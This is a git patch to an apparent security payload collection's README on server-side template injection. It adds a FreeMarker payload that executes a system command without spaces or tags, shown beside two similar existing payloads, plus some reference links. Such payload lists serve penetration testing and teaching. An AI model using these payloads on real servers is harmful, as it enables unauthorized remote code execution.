From 601db0e188dc58d19be1e89a867eee7be9ae3b59 Mon Sep 17 00:00:00 2001 From: Brendan Scarvell Date: Mon, 24 Jun 2019 21:38:56 +1000 Subject: [PATCH] Added freemarker PoC that doesn't require spaces or tags --- Server Side Template Injection/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index f994467..86c4113 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}` ```js <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} +${"freemarker.template.utility.Execute"?new()("id")} ``` ## Jade / Codepen @@ -334,4 +335,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230 * [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/) * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9) -* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf) \ No newline at end of file +* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)